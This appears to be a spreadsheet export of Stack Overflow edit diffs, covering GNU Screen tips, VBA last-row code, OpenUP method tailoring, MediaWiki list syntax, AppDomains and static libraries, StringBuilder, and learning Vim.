  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;1&lt;/kbd&gt; to select window 1, &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;4&lt;/kbd&gt; to select window 4 and so on&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt; to flick between the last two active windows&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;shift&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt; (upper-case a) allows you to rename the current window&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;`&lt;/kbd&gt; (for me, that's &lt;kbd&gt;shift&lt;/kbd&gt;+&lt;kbd&gt;2&lt;/kbd&gt; - the quote mark) lists windows, you can use the arrows and select one. Also useful with the "tab bar" setting I'll list in a second&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; A few other useful things I've stumbled across:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Use the &lt;code&gt;-U&lt;/code&gt; flag when you launch screen so it supports Unicode (for example, &lt;code&gt;screen -xU&lt;/code&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt; The &lt;code&gt;-x&lt;/code&gt; flag allows you to reattach the same session multiple times. (&lt;code&gt;-r&lt;/code&gt; disconnects existing connections)&lt;/li&gt; _x000D_
  &lt;li&gt; You can do interesting stuff with the status bar. I have my setup to display &lt;code&gt;[ hostname ][ 0-$ bash (1*$ irssi) ][16/09 9:32]&lt;/code&gt; (Running on hostname, it has two windows. This is set by the hardstatus lines in my .screenrc (at the end of the answer)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;startup_message off_x000D_
vbell off_x000D_
hardstatus alwayslastline_x000D_
hardstatus string '%{gk}[ %{G}%H %{g}][%= %{wk}%?%-Lw%?%{=b kR}(%{W}%n*%f %t%?(%u)%?%{=b kR})%{= kw}%?%+Lw%?%?%= %{g}]%{=y C}[%d/%m %c]%{W}'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;a href="http://dasunhegoda.com/unix-screen-command/263/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;More info&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is GNU Screen? Great!&lt;/p&gt; _x000D_
 &lt;p&gt; Erm, a slightly more useful answer: it allows you to run multiple console applications, or commands, in one terminal. Kind of like a tabbed terminal emulator. In fact, that's exactly what it is (just not done with the regular GUI toolkits)&lt;/p&gt; _x000D_
 &lt;p&gt; Why is it so great? Simple, you can run a program in a screen session (Run &lt;code&gt;screen&lt;/code&gt; and it runs your default shell, run &lt;code&gt;screen myapp&lt;/code&gt; and it runs myapp in the session), hit &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt; (the screen control sequence) and then press &lt;kbd&gt;d&lt;/kbd&gt; (&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;,&lt;kbd&gt;d&lt;/kbd&gt;) to detach.&lt;/p&gt; _x000D_
 &lt;p&gt; The program keeps running in the background, &lt;em&gt;but&lt;/em&gt;, unlike doing &lt;code&gt;mycmd &amp;amp;&lt;/code&gt;, you can run &lt;code&gt;screen -r&lt;/code&gt; to reattach the session, and everything is as you left it. You can send input to the command, if it's a curses UI, everything still works just like if it were a "real" terminal.&lt;/p&gt; _x000D_
 &lt;p&gt; It's very popular with console IRC clients - you can run (say) &lt;code&gt;screen irssi&lt;/code&gt; and reattach the session from anywhere you can SSH from.&lt;/p&gt; _x000D_
 &lt;p&gt; A few useful commands:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;c&lt;/kbd&gt; to make a new virtual terminal (or "window") in the session&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;n&lt;/kbd&gt; and &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;p&lt;/kbd&gt; to cycle through multiple windows&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;1&lt;/kbd&gt; to select window 1, &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;4&lt;/kbd&gt; to select window 4 and so on&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt; to flick between the last two active windows&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;shift&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt; (upper-case a) allows you to rename the current window&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;`&lt;/kbd&gt; (for me, that's &lt;kbd&gt;shift&lt;/kbd&gt;+&lt;kbd&gt;2&lt;/kbd&gt; - the quote mark) lists windows, you can use the arrows and select one. Also useful with the "tab bar" setting I'll list in a second&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; A few other useful things I've stumbled across:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Use the &lt;code&gt;-U&lt;/code&gt; flag when you launch screen so it supports Unicode (for example, &lt;code&gt;screen -xU&lt;/code&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt; The &lt;code&gt;-x&lt;/code&gt; flag allows you to reattach the same session multiple times. (&lt;code&gt;-r&lt;/code&gt; disconnects existing connections)&lt;/li&gt; _x000D_
  &lt;li&gt; You can do interesting stuff with the status bar. I have my setup to display &lt;code&gt;[ hostname ][ 0-$ bash (1*$ irssi) ][16/09 9:32]&lt;/code&gt; (Running on hostname, it has two windows. This is set by the hardstatus lines in my .screenrc (at the end of the answer)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;startup_message off_x000D_
vbell off_x000D_
hardstatus alwayslastline_x000D_
hardstatus string '%{gk}[ %{G}%H %{g}][%= %{wk}%?%-Lw%?%{=b kR}(%{W}%n*%f %t%?(%u)%?%{=b kR})%{= kw}%?%+Lw%?%?%= %{g}]%{=y C}[%d/%m %c]%{W}'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Zeta</t>
  </si>
  <si>
    <t>Techie</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How about:&lt;/p&gt; _x000D_
 &lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt; &lt;span class="hljs-keyword"&gt;Sub&lt;/span&gt; GetLastRow(strSheet, strColum)_x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt; &lt;span class="hljs-keyword"&gt;Dim&lt;/span&gt; MyRange &lt;span class="hljs-keyword"&gt;As&lt;/span&gt; Range_x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt; &lt;span class="hljs-keyword"&gt;Dim&lt;/span&gt; lngLastRow &lt;span class="hljs-keyword"&gt;As&lt;/span&gt; &lt;span class="hljs-type"&gt;Long&lt;/span&gt;_x000D_
_x000D_
    &lt;span class="hljs-keyword"&gt;Set&lt;/span&gt; MyRange = Worksheets(strSheet).Range(strColum &amp;amp; &lt;span class="hljs-string"&gt;"1"&lt;/span&gt;)_x000D_
_x000D_
    lngLastRow = Cells(&lt;span class="hljs-number"&gt;65536&lt;/span&gt;, MyRange.Column).&lt;span class="hljs-keyword"&gt;End&lt;/span&gt;(xlUp).Row_x000D_
 &lt;span class="hljs-keyword"&gt;End&lt;/span&gt; &lt;span class="hljs-keyword"&gt;Sub&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Re Comment&lt;/p&gt; _x000D_
 &lt;p&gt; This&lt;/p&gt; _x000D_
 &lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt;  Cells.Find(&lt;span class="hljs-string"&gt;"*"&lt;/span&gt;,SearchOrder:=xlByRows,SearchDirection:=xlPrevious).Row_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Will return the row number of the last cell even when only a single cell in the last row has data.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How about:&lt;/p&gt; _x000D_
 &lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt; &lt;span class="hljs-keyword"&gt;Sub&lt;/span&gt; GetLastRow(strSheet, strColum)_x000D_
 &lt;span class="hljs-keyword"&gt;Dim&lt;/span&gt; MyRange &lt;span class="hljs-keyword"&gt;As&lt;/span&gt; Range_x000D_
 &lt;span class="hljs-keyword"&gt;Dim&lt;/span&gt; lngLastRow &lt;span class="hljs-keyword"&gt;As&lt;/span&gt; &lt;span class="hljs-type"&gt;Long&lt;/span&gt;_x000D_
_x000D_
    &lt;span class="hljs-keyword"&gt;Set&lt;/span&gt; MyRange = Worksheets(strSheet).Range(strColum &amp;amp; &lt;span class="hljs-string"&gt;"1"&lt;/span&gt;)_x000D_
_x000D_
    lngLastRow = Cells(&lt;span class="hljs-number"&gt;65536&lt;/span&gt;, MyRange.Column).&lt;span class="hljs-keyword"&gt;End&lt;/span&gt;(xlUp).Row_x000D_
 &lt;span class="hljs-keyword"&gt;End&lt;/span&gt; &lt;span class="hljs-keyword"&gt;Sub&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Re Comment&lt;/p&gt; _x000D_
 &lt;p&gt; This&lt;/p&gt; _x000D_
 &lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt;  Cells.Find(&lt;span class="hljs-string"&gt;"*"&lt;/span&gt;,SearchOrder:=xlByRows,SearchDirection:=xlPrevious).Row_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Will return the row number of the last cell even when only a single cell in the last row has data.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Lipis</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I am&lt;/span&gt; making a method combining &lt;code&gt;&lt;span class="diff-delete"&gt;Scrum&lt;/span&gt;&lt;/code&gt; with the &lt;code&gt;&lt;span class="diff-delete"&gt;OpenUP&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;lifecycle&lt;/span&gt;&lt;/code&gt; and deliverables. I also want to keep the &lt;code&gt;&lt;span class="diff-delete"&gt;OpenUP&lt;/span&gt;&lt;/code&gt; disciplines apart from &lt;code&gt;&lt;span class="diff-delete"&gt;Project Management&lt;/span&gt;&lt;/code&gt;. I can &lt;code&gt;&lt;span class="diff-delete"&gt;hide&lt;/span&gt;&lt;/code&gt; it so that it's not immediately obvious in my generated method site. But when you &lt;code&gt;&lt;span class="diff-delete"&gt;navigate&lt;/span&gt;&lt;/code&gt; to the &lt;span class="diff-delete"&gt;Risk List&lt;/span&gt; artefact for example the &lt;code&gt;&lt;span class="diff-delete"&gt;PM&lt;/span&gt;&lt;/code&gt; is still seen as contributing, and if you click on the link, you get taken to the &lt;code&gt;&lt;span class="diff-delete"&gt;PM&lt;/span&gt;&lt;/code&gt; Discipline page.&lt;/p&gt; _x000D_
 &lt;p&gt; How can I remove it completely from my method without deleting it from the &lt;code&gt;&lt;span class="diff-delete"&gt;OpenUP&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;library&lt;/span&gt;&lt;/code&gt; which I'm consuming?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I'm&lt;/span&gt; making a method combining &lt;span class="diff-add"&gt;Scrum&lt;/span&gt; with the &lt;span class="diff-add"&gt;OpenUP lifecycle&lt;/span&gt; and deliverables. I also want to keep the &lt;span class="diff-add"&gt;OpenUP&lt;/span&gt; disciplines apart from &lt;span class="diff-add"&gt;"Project Management"&lt;/span&gt;. I can &lt;span class="diff-add"&gt;"hide"&lt;/span&gt; it so that it's not immediately obvious in my generated method site. But when you &lt;span class="diff-add"&gt;then navigate&lt;/span&gt; to the &lt;span class="diff-add"&gt;"Risk List"&lt;/span&gt; artefact for example the &lt;span class="diff-add"&gt;PM&lt;/span&gt; is still seen as contributing, and if you click on the link, you get taken to the &lt;span class="diff-add"&gt;PM&lt;/span&gt; Discipline page.&lt;/p&gt; _x000D_
 &lt;p&gt; How can I remove it completely from my method without deleting it from the &lt;span class="diff-add"&gt;OpenUP library&lt;/span&gt; which I'm consuming?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>BoltClock â™¦</t>
  </si>
  <si>
    <t>Bernd Elkemann</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;There are at least three list styles in mediawiki formatting, Numbered(#), Bulleted(*), and blank(:).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you want SomeStuff aligned with Item1 and Item2 use the following&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#Item1_x000D_
&lt;span class="diff-delete"&gt;:SomeStuff_x000D_
#Item2_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you want SomeStuff as a child of Item1 use the following&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;#Item1_x000D_
&lt;/span&gt;#:&lt;span class="diff-delete"&gt;SomeStuff&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;#Item1&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Like this&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#Item1_x000D_
#:&lt;span class="diff-add"&gt;Somestuff&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;#Item2&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>finnw</t>
  </si>
  <si>
    <t>camilla.greer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; there is one statically-linked static.lib that has a function that increments:&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; extern int CallCount = 0;_x000D_
 int TheFunction()_x000D_
 {_x000D_
     void *p = &amp;amp;CallCount;_x000D_
     printf("Function called");_x000D_
     return CallCount++;_x000D_
 }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; static.lib is linked into a managed C++/CLI managed.dll that wraps TheFunction method:&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; int Managed::CallLibFunc()_x000D_
 {_x000D_
     return TheFunction();_x000D_
 }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; Test app has a reference to managed.dll and creates multiple domains that call C++/CLI wrapper:&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; static void Main(string[] args)_x000D_
 {_x000D_
     Managed c1 = new Managed();_x000D_
     int val1 = c1.CallLibFunc();_x000D_
     // value is zero_x000D_
_x000D_
     AppDomain ad = AppDomain.CreateDomain("NewDomain");_x000D_
     Managed c = ad.CreateInstanceAndUnwrap(a.FullName, typeof(Managed).FullName)_x000D_
         as Managed;_x000D_
     int val2 = c.CallLibFunc();_x000D_
     // value is one _x000D_
 }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Question:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Based on what I have read in Essential .NET Vol1 The CLR by Don Box, I would expect val2 to be zero since a brand new copy of managed.dll/static.lib is loaded when CreateInstanceAndUnwrap is called. Am I misunderstanding what is happening? The static library does not seem to be respecting the appdomain boundaries since it's unmanaged code. Is there a way to get around this issue other than by creating a brand new process for instantiating Managed?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-add"&gt; 1. there is one statically-linked static.lib that has a function that increments: &lt;/span&gt; _x000D_
  &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;_x000D_
    extern int CallCount = 0;_x000D_
    int TheFunction()_x000D_
    {_x000D_
        void *p = &amp;amp;CallCount;_x000D_
        printf("Function called");_x000D_
        return CallCount++;_x000D_
    }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;ol start="2"&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
   &lt;li&gt;&lt;span class="diff-add"&gt; static.lib is linked into a managed C++/CLI managed.dll that wraps TheFunction method:&lt;/span&gt;&lt;/li&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;/ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;_x000D_
    int Managed::CallLibFunc()_x000D_
    {_x000D_
        return TheFunction();_x000D_
    }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;ol start="3"&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
   &lt;li&gt;&lt;span class="diff-add"&gt; Test app has a reference to managed.dll and creates multiple domains that call C++/CLI wrapper:&lt;/span&gt;&lt;/li&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;/ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;_x000D_
    static void Main(string[] args)_x000D_
    {_x000D_
        Managed c1 = new Managed();_x000D_
        int val1 = c1.CallLibFunc();_x000D_
        // value is zero_x000D_
_x000D_
        AppDomain ad = AppDomain.CreateDomain("NewDomain");_x000D_
        Managed c = ad.CreateInstanceAndUnwrap(a.FullName, typeof(Managed).FullName) as Managed;_x000D_
        int val2 = c.CallLibFunc();_x000D_
        // value is one _x000D_
    }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-add"&gt;Question:&lt;/span&gt; _x000D_
 &lt;p&gt; Based on what I have read in Essential .NET Vol1 The CLR by Don Box, I would expect val2 to be zero since a brand new copy of managed.dll/static.lib is loaded when CreateInstanceAndUnwrap is called. Am I misunderstanding what is happening? The static library does not seem to be respecting the appdomain boundaries since it's unmanaged code. Is there a way to get around this issue other than by creating a brand new process for instantiating Managed?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thank you very much everyone!&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Hans Passant</t>
  </si>
  <si>
    <t>Deduplicator</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; StringBuilder reduces the number of allocations and assignments, at a cost of extra memory used. Used properly, it can completely remove the need for the compiler to allocate larger and larger strings over and over until the result is found.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;string result = "";_x000D_
for(int i = 0; i != N; ++i)_x000D_
{_x000D_
   result = result + i.ToString();   // allocates a new string, then assigns it to result, which gets repeated N times_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; vs.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String result;_x000D_
StringBuilder sb = new StringBuilder(10000);   // create a buffer of 10k_x000D_
for(int i = 0; i != N; ++i)_x000D_
{_x000D_
   &lt;span class="diff-delete"&gt;sb&lt;/span&gt;.&lt;span class="diff-delete"&gt;Append&lt;/span&gt;(i.ToString());          // fill the buffer, resizing if it overflows the buffer_x000D_
}_x000D_
_x000D_
result = sb.ToString();   // assigns once_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; StringBuilder reduces the number of allocations and assignments, at a cost of extra memory used. Used properly, it can completely remove the need for the compiler to allocate larger and larger strings over and over until the result is found.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;string result = "";_x000D_
for(int i = 0; i != N; ++i)_x000D_
{_x000D_
   result = result + i.ToString();   // allocates a new string, then assigns it to result, which gets repeated N times_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; vs.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String result;_x000D_
StringBuilder sb = new StringBuilder(10000);   // create a buffer of 10k_x000D_
for(int i = 0; i != N; ++i)_x000D_
{_x000D_
   &lt;span class="diff-add"&gt;result&lt;/span&gt;.&lt;span class="diff-add"&gt;AppendString&lt;/span&gt;(i.ToString());          // fill the buffer, resizing if it overflows the buffer_x000D_
}_x000D_
_x000D_
result = sb.ToString();   // assigns once_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mathias Müller</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The first thing I'd do is lay a piece of paper or a book over your arrow keys and your ins/home/end/pgup/down keys. Those aren't needed in Vi.&lt;/p&gt; _x000D_
 &lt;p&gt; Next I'd get used to hitting ctrl+[ whenever you're told to hit escape. It's much faster and you won't need to take your hands off the keyboard.&lt;/p&gt; _x000D_
 &lt;p&gt; Then I'd watch my screencasts:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=FcpQ7koECgk" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=FcpQ7koECgk&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=c6WCm6z5msk" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=c6WCm6z5msk&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=BPDoI7gflxM" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=BPDoI7gflxM&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=J1_CfIb-3X4" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=J1_CfIb-3X4&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Then, just practice practice practice.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;edit&lt;/em&gt; The reason for avoiding the arrow keys is that they slow you down. One of the largest benefits of Vim is the speed it allows you. The arrow keys also prevent you from really embracing the modal nature, which is very powerful when mastered.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; A good place to start would be &lt;/span&gt;&lt;a href="http://dasunhegoda.com/tutorial-in-vim-editor-introduction-vim/510" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The first thing I'd do is lay a piece of paper or a book over your arrow keys and your ins/home/end/pgup/down keys. Those aren't needed in Vi.&lt;/p&gt; _x000D_
 &lt;p&gt; Next I'd get used to hitting ctrl+[ whenever you're told to hit escape. It's much faster and you won't need to take your hands off the keyboard.&lt;/p&gt; _x000D_
 &lt;p&gt; Then I'd watch my screencasts:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=FcpQ7koECgk" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=FcpQ7koECgk&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=c6WCm6z5msk" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=c6WCm6z5msk&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=BPDoI7gflxM" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=BPDoI7gflxM&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=J1_CfIb-3X4" rel="nofollow noreferrer"&gt;http://www.youtube.com/watch?v=J1_CfIb-3X4&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Then, just practice practice practice.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;edit&lt;/em&gt; The reason for avoiding the arrow keys is that they slow you down. One of the largest benefits of Vim is the speed it allows you. The arrow keys also prevent you from really embracing the modal nature, which is very powerful when mastered.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Flexo</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; First of all, you may want to pick up Vim; it has a vastly superior feature set along with everything vi has.&lt;/p&gt; _x000D_
 &lt;p&gt; That said, it takes discipline to learn. If you have a job and can't afford the productivity hit (without getting fired), I'd suggest taking on a weekend project for the sole purpose of learning the editor. Keep its documentation open as you work, and be disciplined enough not to chicken out. As you learn more, become efficient and start relying on muscle memory, it won't be as hard to stick with it.&lt;/p&gt; _x000D_
 &lt;p&gt; I've been using Vim for so long that I don't even think about what keys to press to search or navigate or save. And my hands never leave the keyboard. To use Vim is one of the best choices I've made in my programming career.&lt;/p&gt; _x000D_
